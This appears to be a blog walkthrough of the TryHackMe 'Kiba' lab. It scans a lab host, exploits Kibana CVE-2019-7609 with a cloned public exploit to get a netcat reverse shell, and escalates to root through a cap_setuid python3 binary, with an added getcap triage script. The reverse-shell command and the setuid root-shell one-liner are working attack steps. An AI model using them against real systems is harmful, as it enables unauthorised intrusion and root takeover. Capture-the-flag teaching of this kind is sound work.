Try Hack Me: Kiba

The skills tested in this room: rustscan, CVE research, Linux capabilities, privilege escalation, reverse shells, and nc (netcat).

This room was released today, 8/28/2020, and I wanted to see if I could crack it. It took me less than 30 minutes to retrieve the root flag. This is also the first time I’ve exploited Linux capabilities to do privilege escalation.

I also chose to mask part of the answers, so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.

Shoutout to the room creator, @stuxnet. You can access the room at https://tryhackme.com/room/kiba

I was assigned a victim IP address of 10.10.245.225 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.

There are seven questions to answer to complete this room:

1. What is the vulnerability that is specific to programming languages with prototype-based inheritance?

  • P******** P********

2. What is the version of visualization dashboard installed in the server?

  • 6.*.*

3. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

  • CVE-****-****

4. Compromise the machine and locate user.txt:

  • THM{1*_****_*****_******_****_**e}

5. Capabilities is a concept that provides a security system that allows “divide” root privileges into different values:

  • No answer needed

6. How would you recursively list all of these capabilities?

  • g***** ** *

7. Escalate privileges and obtain root.txt

  • THM{p********_**********_*****_*********s}

Steps:

1. Google “vulnerability that is specific to programming languages with prototype-based inheritance”

2. Scan the victim IP address using rustscan. Type: rustscan -b 500 10.10.245.225 (the -b flag sets the batch size, i.e. how many ports are probed at once)

Port 5601 is where the Kibana app is accessible

3. Open a browser and go to: http://10.10.245.225:5601

4. Go to Management to see the version of the visualization software:

Kibana version

5. Google search for “Kibana CVE”

6. Download the exploit script. Type: git clone https://github.com/LandGrey/CVE-2019-7609.git (sudo is not needed to clone a repository; running it under sudo only leaves the files owned by root)

Downloaded the exploit to our attack machine

7. Set up a listener on your attack machine for a reverse-shell connection. Type: nc -nlvp 9999

Listening and waiting for a connection

8. Run the exploit that we just downloaded. Type: cd CVE-2019-7609 && python CVE-2019-7609-kibana-rce.py -u http://10.10.245.225:5601 -host 10.2.*.* -port 9999 --shell

  • -u http://10.10.245.225:5601: the target URL
  • -host 10.2.*.*: the remote host for the reverse shell. Use the IP address of your tun0 network adapter
  • -port 9999: any port you want to use for your listener; it must match the port given to nc in the previous step
  • --shell: initiate a reverse shell
Ran the exploit

9. Go to the listener we set up on our attack machine to verify connection:

We have an initial foothold of the server

10. Do a find for the user.txt. Type: find / -name user.txt 2>/dev/null

User flag location

11. Open the file to retrieve the flag. Type: cat /home/kiba/user.txt

User flag found!

12. Questions 5 and 6 were talking about capabilities, so I am guessing that to escalate our privileges we will have to exploit capabilities. I hadn’t heard of capabilities before, so I went ahead and ran sudo -l just to check whether our current user has any sudo privileges:

Nothing here

13. I did a quick Google search for “linux capabilities.” To list every file on the victim machine that has file capabilities set, type: getcap -r / 2>/dev/null. I again added 2>/dev/null to keep the permission errors out of the results:

  • Here’s a quick glimpse of what each capability allows (image source: https://hackingarticles.in):

14. If we go back to the output in Step 13, the file /home/kiba/.hackmeplease/python3 carries the capability cap_setuid+ep, meaning CAP_SETUID is in the binary’s permitted (p) and effective (e) sets. The image above says that cap_setuid “allows changing of the UID”. The python3 file is owned by root, but the owner is not what matters here: any user who can execute the binary gets CAP_SETUID in the resulting process, so we, as user kiba, can call setuid() to change our UID to “0”, which is root.

15. Time to exploit the capability-bearing binary and change user kiba’s UID to root. Type: /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' and then run id to confirm uid=0(root):

We are ROOT!
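Steps 13 to 15 generalise into a quick triage of getcap output: of the capabilities it reports, which ones hand a low-privileged user a route to root, and which only look alarming. The script below is an added example, not part of the original walkthrough or the room. It parses sample getcap lines constructed here (only the /home/kiba/.hackmeplease/python3 entry mirrors the room; the other paths and capability sets are made up to cover the common cases), handles both the older “path = caps+ep” and the newer “path caps=ep” output formats, reports only capabilities that are in the file’s effective set, and for cap_setuid on a Python interpreter prints the same one-liner used in Step 15.

```shell
#!/bin/sh
# Added example (not from the walkthrough): triage `getcap -r / 2>/dev/null`
# output for file capabilities that commonly give a low-privileged user a
# path to root when they are EFFECTIVE on a binary that user can execute.

# Capabilities worth chasing: setuid/setgid (become root), dac_override and
# dac_read_search (write/read any file), sys_admin and sys_module (mount,
# load kernel modules), sys_ptrace (attach to root processes), chown/fowner
# (take over root-owned files).
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_module cap_sys_ptrace cap_chown cap_fowner"

# Constructed sample of getcap output. Only the python3 line mirrors the room;
# the rest are invented to show both libcap output formats, harmless
# capabilities, and a permitted-only (=p) capability that exec alone does not
# make effective.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/perl cap_setuid=p
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep'

# flag_caps: read getcap lines on stdin, print "<path> <capability>" for each
# dangerous capability that is in the file's effective set. A capability that
# is only permitted is not in effect after exec (the program would have to
# raise it itself), so it is not reported here.
flag_caps() {
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        path=${line%% *}        # first field: the file
        spec=${line##* }        # last field: e.g. cap_setuid+ep or cap_setuid=ep
        case $spec in
            *+*) names=${spec%%+*}; flags=${spec##*+} ;;   # old libcap: caps+flags
            *=*) names=${spec%%=*}; flags=${spec##*=} ;;   # new libcap: caps=flags
            *)   continue ;;
        esac
        case $flags in *e*) ;; *) continue ;; esac          # require the effective bit
        for cap in $(printf '%s' "$names" | tr ',' ' '); do
            case " $DANGEROUS_CAPS " in
                *" $cap "*) printf '%s %s\n' "$path" "$cap" ;;
            esac
        done
    done
}

# exploit_hint: for the capability the room used, print the Python one-liner
# that turns it into a root shell (assumes the binary is a Python interpreter,
# as in the room); for anything else, just point at the finding.
exploit_hint() {
    case $2 in
        cap_setuid) printf "%s -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n" "$1" ;;
        *)          printf '%s: %s is effective; look up the abuse primitive for it\n' "$1" "$2" ;;
    esac
}

# Run the triage over the constructed sample. On a real target, replace the
# printf with:  getcap -r / 2>/dev/null | flag_caps
printf '%s\n' "$SAMPLE_GETCAP" | flag_caps | while read -r p c; do
    exploit_hint "$p" "$c"
done
```

The permitted-only perl entry in the sample is deliberately not reported: file capabilities only become effective on exec when the “e” bit is set, which is why cap_setuid+ep on the room’s python3 was enough for os.setuid(0) to succeed without any extra work.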

16. Find the root flag by again typing: find / -name root.txt 2>/dev/null

Root flag location

17. Open the file root.txt by typing cat /root/root.txt

Root flag found!

Hope you enjoyed and learned something new. Please subscribe to my blog to get updates on new content.

Published by lightkunyagami

https://tryhackme.com/badge/18276
